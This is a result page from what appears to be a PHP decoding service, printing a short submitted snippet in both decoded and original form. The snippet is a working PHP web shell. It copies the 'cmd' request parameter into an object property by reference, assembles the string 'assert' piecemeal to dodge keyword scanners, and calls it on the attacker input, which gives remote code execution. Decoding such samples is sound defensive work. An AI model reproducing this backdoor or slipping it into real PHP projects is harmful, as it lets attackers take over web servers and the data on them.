Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php class talker{ public $data = 'Hi'; public function & get(){ return $..

Decoded Output download

<?php
class talker{
    public $data = 'Hi';
    public function & get(){
        return $this->data;
    }
}
$aa = new talker();
$d = &$aa->get();
$d = $_GET[cmd];
function foo(&$var)
{
    $var=$var.'t';
}
$a="asser";
foo($a);
$a($aa->data); ?>

Did this file decode correctly?

Original Code

<?php
class talker{
    public $data = 'Hi';
    public function & get(){
        return $this->data;
    }
}
$aa = new talker();
$d = &$aa->get();
$d = $_GET[cmd];
function foo(&$var)
{
    $var=$var.'t';
}
$a="asser";
foo($a);
$a($aa->data);

Function Calls

None

Variables

None

Stats

MD5 16767a4ec7e85cdb37acaf7da0903c96
Eval Count 0
Decode Time 94 ms